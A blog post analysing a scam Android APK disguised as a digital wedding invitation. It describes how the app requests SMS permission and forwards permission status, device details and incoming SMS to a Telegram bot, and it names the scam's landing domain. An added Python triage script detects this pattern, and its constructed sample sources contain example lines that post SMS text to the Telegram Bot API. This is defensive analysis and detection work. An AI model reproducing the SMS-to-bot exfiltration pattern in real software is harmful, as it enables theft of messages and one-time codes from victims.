Musubi

23 June 2023

by yunaranyancat

Introduction: In the name of Allah, the Most Gracious, the Most Merciful

First and foremost, I would like to express my gratitude to Fareed Fauzi (Ayed) from NetByteSec for providing me with the APK file. Without his assistance, this blog post would not have been possible.


This blog post will be brief and concise, aiming to focus primarily on the malicious aspect of the code within the application.

Uncle, who's getting married?


Recently, there have been reports about scammers attempting to deceive elderly citizens by luring them into installing a malicious application under the pretext of an invitation to a fictitious wedding.

MainActivity


When decompiling the application, several classes can be observed. One of these classes is the MainActivity class.


This class serves as the entry point of the Android application; Android calls its onCreate() method when the activity is created.

Within the onCreate() method, various actions are performed. These include loading a URL from https://ejemputan.com/kadkahwindigital and checking the Android version of the device.


Starting from line 44, the code checks whether the permission to read SMS has been granted. If it has not, the requestPermissions() method is called, which prompts the user to grant the application permission to read SMS.

What the bot?


Based on the result of the permission check, these methods execute specific actions. Regardless of whether the permission is granted or not, they send an HTTP request to a Telegram bot, using the sendMessage endpoint of the Telegram Bot API so that the result arrives as a Telegram message.

The purpose of the bot is to notify the attacker about the status of the permission, indicating whether it has been granted or not.


Furthermore, the application also sends device details to the attacker. This could include information such as the device model, operating system version, unique identifiers, and other relevant device-specific details.


ReceiveSMS


This class contains a method to handle incoming SMS messages.


The SMS is parsed and sent to the Telegram bot for further processing.

SendSMS


The method essentially sends an SMS to the target number and notifies the Telegram bot about this activity.
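
A static triage check for the pattern described above (SMS permissions combined with Telegram Bot API sendMessage calls and SMS receive/send code), as an added example that is not from the analysed APK or the original post. The function name `triage`, the sample manifest, the sample sources and the placeholder bot token are constructed for illustration.

```python
import re

# Telegram Bot API calls have the form https://api.telegram.org/bot<token>/<method>.
BOT_CALL = re.compile(r"api\.telegram\.org/bot([0-9]+:[A-Za-z0-9_-]+)/(\w+)")
PERMISSION = re.compile(r'<uses-permission[^>]*android:name="android\.permission\.(\w+)"')
SMS_PERMISSIONS = {"READ_SMS", "RECEIVE_SMS", "SEND_SMS"}

def triage(manifest_xml, sources):
    """Return findings for one decompiled APK.

    manifest_xml: decoded AndroidManifest.xml text
    sources: dict of {file name: decompiled source text}
    """
    sms = sorted(SMS_PERMISSIONS & set(PERMISSION.findall(manifest_xml)))
    bot_calls = []
    for name, text in sources.items():
        for token, method in BOT_CALL.findall(text):
            # Keep only the numeric bot id; never log the full secret token.
            bot_calls.append((name, token.split(":")[0], method))
    receivers = [n for n, t in sources.items() if "SMS_RECEIVED" in t or "SmsMessage" in t]
    senders = [n for n, t in sources.items() if "sendTextMessage" in t]
    return {
        "sms_permissions": sms,
        "bot_calls": sorted(bot_calls),
        "sms_receivers": sorted(receivers),
        "sms_senders": sorted(senders),
        # The pattern described on this page: SMS access plus Bot API exfiltration.
        "suspicious": bool(sms) and bool(bot_calls),
    }

# Constructed sample input (not taken from the analysed APK).
SAMPLE_MANIFEST = """<manifest package="com.example.invite">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
</manifest>"""
SAMPLE_SOURCES = {
    "MainActivity.java": 'String u = "https://api.telegram.org/bot1234567890:PLACEHOLDER_TOKEN/sendMessage?chat_id=0&text=granted";',
    "ReceiveSMS.java": 'SmsMessage m = SmsMessage.createFromPdu(pdu); post("https://api.telegram.org/bot1234567890:PLACEHOLDER_TOKEN/sendMessage", m.getMessageBody());',
    "SendSMS.java": "SmsManager.getDefault().sendTextMessage(number, null, body, null, null);",
    "Util.java": "class Util {}",
}

if __name__ == "__main__":
    for key, value in triage(SAMPLE_MANIFEST, SAMPLE_SOURCES).items():
        print(key, value)
```

The numeric bot id in each finding is enough to group samples that report to the same bot without storing the token itself.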

exit

It appears that the bot is still operational, so it is crucial to exercise caution and avoid installing any unfamiliar APK files.


Thanks for reading! See ya.
